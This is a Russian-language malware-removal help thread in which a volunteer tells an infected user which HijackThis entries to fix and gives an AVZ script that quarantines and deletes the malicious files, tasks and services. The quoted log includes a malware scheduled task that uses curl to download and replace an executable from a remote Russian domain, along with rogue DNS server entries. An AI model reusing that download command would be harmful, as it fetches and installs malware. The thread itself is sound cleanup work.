Опять нацеплял дряни. Все что мог, удалил антивирусом.
Остальное перелопатил вручную.
Машина на i7 тормозит как 1-й пентиум.
Printable View
Опять нацеплял дряни. Все что мог, удалил антивирусом.
Остальное перелопатил вручную.
Машина на i7 тормозит как 1-й пентиум.
Уважаемый(ая) [B]440[/B], спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите[/url] (в [B]Windows Vista/7/8/10[/B] необходимо запускать через правую кнопку мыши [B]Запуск от имени администратора)[/B]):[code]O17 - HKLM\System\CSS\Services\Tcpip\..\{11F8A404-72E7-4E66-9A7C-55D90F1AB305}: NameServer = 104.197.191.4
O17 - HKLM\System\CSS\Services\Tcpip\..\{17397C8A-56E6-4309-A7A7-F136385D9613}: NameServer = 104.197.191.4
O17 - HKLM\System\CSS\Services\Tcpip\..\{2C7B2EE4-D141-4A1C-97DA-E7C9EC9B9B3F}: NameServer = 190.202.81.115
O17 - HKLM\System\CSS\Services\Tcpip\..\{2C7B2EE4-D141-4A1C-97DA-E7C9EC9B9B3F}: NameServer = 192.95.48.17
O17 - HKLM\System\CSS\Services\Tcpip\..\{5BE2EC8F-309E-4B5A-9BE7-74DFB1B739A1}: NameServer = 192.168.1.1
O17 - HKLM\System\CSS\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 156.154.126.70
O17 - HKLM\System\CSS\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 158.69.57.22
O17 - HKLM\System\CSS\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 186.167.16.187
O17 - HKLM\System\CSS\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 200.8.65.30
O17 - HKLM\System\CSS\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 208.67.222.220
O17 - HKLM\System\CSS\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 75.75.76.76
O17 - HKLM\System\CSS\Services\Tcpip\..\{708573E3-B871-4F8A-9447-EC9F706F7DCE}: NameServer = 104.197.191.4
O17 - HKLM\System\CSS\Services\Tcpip\..\{74CE9FE5-FCB4-4CA7-A2E2-F4826A481FC4}: NameServer = 104.197.191.4
O17 - HKLM\System\CSS\Services\Tcpip\..\{9430F82A-33AD-4805-A245-036425D9039E}: NameServer = 104.197.191.4
O17 - HKLM\System\CSS\Services\Tcpip\..\{99609B11-2461-4FD2-A038-99485FE71D1F}: NameServer = 82.163.142.7
O17 - HKLM\System\CSS\Services\Tcpip\..\{99609B11-2461-4FD2-A038-99485FE71D1F}: NameServer = 95.211.158.134
O17 - HKLM\System\CSS\Services\Tcpip\..\{9ED4BEA7-7355-4294-8900-ACC345D7445A}: NameServer = 82.163.142.7
O17 - HKLM\System\CSS\Services\Tcpip\..\{9ED4BEA7-7355-4294-8900-ACC345D7445A}: NameServer = 95.211.158.134
O17 - HKLM\System\CSS\Services\Tcpip\..\{A79741A2-9617-4393-8AB5-9735DE286CBA}: NameServer = 207.188.83.232
O17 - HKLM\System\CSS\Services\Tcpip\..\{AB6ED26C-C490-4785-8610-2BDE3F579DDC}: NameServer = 199.85.126.10
O17 - HKLM\System\CSS\Services\Tcpip\..\{AB6ED26C-C490-4785-8610-2BDE3F579DDC}: NameServer = 199.85.127.10
O17 - HKLM\System\CSS\Services\Tcpip\..\{E07146A0-CE89-4A25-8A05-0B2B065E66AA}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{11F8A404-72E7-4E66-9A7C-55D90F1AB305}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{17397C8A-56E6-4309-A7A7-F136385D9613}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{2C7B2EE4-D141-4A1C-97DA-E7C9EC9B9B3F}: NameServer = 190.202.81.115
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{2C7B2EE4-D141-4A1C-97DA-E7C9EC9B9B3F}: NameServer = 192.95.48.17
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{5BE2EC8F-309E-4B5A-9BE7-74DFB1B739A1}: NameServer = 192.168.1.1
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 156.154.126.70
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 158.69.57.22
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 186.167.16.187
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 200.8.65.30
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 208.67.222.220
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 75.75.76.76
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{708573E3-B871-4F8A-9447-EC9F706F7DCE}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{74CE9FE5-FCB4-4CA7-A2E2-F4826A481FC4}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9430F82A-33AD-4805-A245-036425D9039E}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{99609B11-2461-4FD2-A038-99485FE71D1F}: NameServer = 82.163.142.7
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{99609B11-2461-4FD2-A038-99485FE71D1F}: NameServer = 95.211.158.134
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9ED4BEA7-7355-4294-8900-ACC345D7445A}: NameServer = 82.163.142.7
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9ED4BEA7-7355-4294-8900-ACC345D7445A}: NameServer = 95.211.158.134
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{A79741A2-9617-4393-8AB5-9735DE286CBA}: NameServer = 207.188.83.232
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{AB6ED26C-C490-4785-8610-2BDE3F579DDC}: NameServer = 199.85.126.10
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{AB6ED26C-C490-4785-8610-2BDE3F579DDC}: NameServer = 199.85.127.10
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{E07146A0-CE89-4A25-8A05-0B2B065E66AA}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{11F8A404-72E7-4E66-9A7C-55D90F1AB305}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{17397C8A-56E6-4309-A7A7-F136385D9613}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{2C7B2EE4-D141-4A1C-97DA-E7C9EC9B9B3F}: NameServer = 190.202.81.115
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{2C7B2EE4-D141-4A1C-97DA-E7C9EC9B9B3F}: NameServer = 192.95.48.17
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{5BE2EC8F-309E-4B5A-9BE7-74DFB1B739A1}: NameServer = 192.168.1.1
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 156.154.126.70
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 158.69.57.22
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 186.167.16.187
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 200.8.65.30
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 208.67.222.220
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 75.75.76.76
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{708573E3-B871-4F8A-9447-EC9F706F7DCE}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{74CE9FE5-FCB4-4CA7-A2E2-F4826A481FC4}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9430F82A-33AD-4805-A245-036425D9039E}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{99609B11-2461-4FD2-A038-99485FE71D1F}: NameServer = 82.163.142.7
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{99609B11-2461-4FD2-A038-99485FE71D1F}: NameServer = 95.211.158.134
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9ED4BEA7-7355-4294-8900-ACC345D7445A}: NameServer = 82.163.142.7
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9ED4BEA7-7355-4294-8900-ACC345D7445A}: NameServer = 95.211.158.134
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{A79741A2-9617-4393-8AB5-9735DE286CBA}: NameServer = 207.188.83.232
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{AB6ED26C-C490-4785-8610-2BDE3F579DDC}: NameServer = 199.85.126.10
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{AB6ED26C-C490-4785-8610-2BDE3F579DDC}: NameServer = 199.85.127.10
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{E07146A0-CE89-4A25-8A05-0B2B065E66AA}: NameServer = 104.197.191.4
O21 - ShellIconOverlayIdentifiers: MEGA (Pending) - {056D528D-CE28-4194-9BA3-BA2E9197FF8C} - C:\Users\TOP\AppData\Local\MEGAsync\ShellExtX64.dll (file missing)
O21 - ShellIconOverlayIdentifiers: MEGA (Synced) - {05B38830-F4E9-4329-978B-1DD28605D202} - C:\Users\TOP\AppData\Local\MEGAsync\ShellExtX64.dll (file missing)
O21 - ShellIconOverlayIdentifiers: MEGA (Syncing) - {0596C850-7BDD-4C9D-AFDF-873BE6890637} - C:\Users\TOP\AppData\Local\MEGAsync\ShellExtX64.dll (file missing)
O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21-32 - ShellIconOverlayIdentifiers: MEGA (Pending) - {056D528D-CE28-4194-9BA3-BA2E9197FF8C} - C:\Users\TOP\AppData\Local\MEGAsync\ShellExtX32.dll (file missing)
O21-32 - ShellIconOverlayIdentifiers: MEGA (Synced) - {05B38830-F4E9-4329-978B-1DD28605D202} - C:\Users\TOP\AppData\Local\MEGAsync\ShellExtX32.dll (file missing)
O21-32 - ShellIconOverlayIdentifiers: MEGA (Syncing) - {0596C850-7BDD-4C9D-AFDF-873BE6890637} - C:\Users\TOP\AppData\Local\MEGAsync\ShellExtX32.dll (file missing)
O22 - Task (Queued): NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe (file missing)
O22 - Task (Queued): curls - C:\Users\TOP\AppData\Roaming\curl\curl.exe (file missing)
O22 - Task (Ready): GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c (file missing)
O22 - Task (Ready): GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler (file missing)
O22 - Task (Ready): MSI - C:\Users\TOP\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="scoped_dir1196_15431\vimehackwin_-_chit_na_vimeworld_c99-a6c___.exe" (file missing)
O22 - Task (Ready): OrbitumUpdateTaskUserS-1-5-21-1771641454-1423502667-3866363202-1000Core - C:\Users\TOP\AppData\Local\Orbitum\Update\GoogleUpdate.exe /c (file missing)
O22 - Task (Ready): OrbitumUpdateTaskUserS-1-5-21-1771641454-1423502667-3866363202-1000UA - C:\Users\TOP\AppData\Local\Orbitum\Update\GoogleUpdate.exe /ua /installsource scheduler (file missing)
O22 - Task (Ready): curl - C:\Users\TOP\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\TOP\AppData\Roaming\curl\curl.exe[/code]
[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/url]:[code]begin
QuarantineFile('C:\Users\TOP\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\TOP\AppData\Roaming\curl\curl_7_54.exe', '');
QuarantineFile('C:\Users\TOP\AppData\Roaming\Microsoft\msi.exe', '');
QuarantineFile('C:\Users\TOP\AppData\Roaming\System\svchost.exe', '');
QuarantineFile('C:\Windows\System32\ihctrl32.dll', '');
QuarantineFile('C:\Windows\System32\themctrl.dll', '');
QuarantineFile('C:\Windows\System32\wbiosrvp.dll', '');
QuarantineFile('C:\Windows\System32\wsaudio.dll', '');
DeleteFile('C:\Users\TOP\AppData\Roaming\curl\curl.exe', '32');
DeleteFile('C:\Users\TOP\AppData\Roaming\curl\curl_7_54.exe', '32');
DeleteFile('C:\Users\TOP\AppData\Roaming\Microsoft\msi.exe', '32');
DeleteFile('C:\Users\TOP\AppData\Roaming\System\svchost.exe', '32');
DeleteFile('C:\Windows\system32\DRIVERS\BAPIDRV64.sys', '32');
DeleteFile('C:\Windows\System32\ihctrl32.dll', '32');
DeleteFile('C:\Windows\System32\themctrl.dll', '32');
DeleteFile('C:\Windows\System32\wbiosrvp.dll', '32');
DeleteFile('C:\Windows\System32\wsaudio.dll', '32');
DeleteFile('http:\amtomil.ru\f.exe', '32');
ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
DeleteService('BAPIDRV');
DeleteService('clr_optimization_v1.03');
DeleteFileMask('c:\users\top\appdata\roaming\curl', '*', true);
DeleteDirectory('c:\users\top\appdata\roaming\curl');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\ihctrl32\Parameters', 'ServiceDll');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\themctrl\Parameters', 'ServiceDll');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\wbiosrvp\Parameters', 'ServiceDll');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\wsaudio\Parameters', 'ServiceDll');
ExecuteRepair(21);
ExecuteFile('ipconfig.exe', '/flushdns', 0, 15000, true);
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.[/code]Компьютер перезагрузится.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
Сделайте новый лог Autologger.
Сделайте лог [URL="http://virusinfo.info/showthread.php?t=146192&p=1041844&viewfull=1#post1041844"]Malwarebytes AdwCleaner[/URL].
Спасибо Вам, дружище. Что бы я без Вас делал....:)
Машина заработала ощутимо шустрее.
Перестало выскакивать окошко антивируса с сообщением "доступ к сайту efrodom.ru заблокирован".
К сожалению, запрошенный карантин я случайно затёр....:( - удалил папку автологгера, совсем забывши, что там карантин.
Извините, ради Бога. Я понимаю, что это был бы мой вклад в базу знаний сайта...:worried:
Лог AdwCleaner нужен был [B]До[/B] очистки, а не после.
Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите[/url] (в [B]Windows Vista/7/8/10[/B] необходимо запускать через правую кнопку мыши [B]Запуск от имени администратора)[/B]):[code]O22 - Task (Ready): MSI - C:\Users\TOP\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="scoped_dir1196_15431\vimehackwin_-_chit_na_vimeworld_c99-a6c___.exe" (file missing)[/code]
И всё на этом.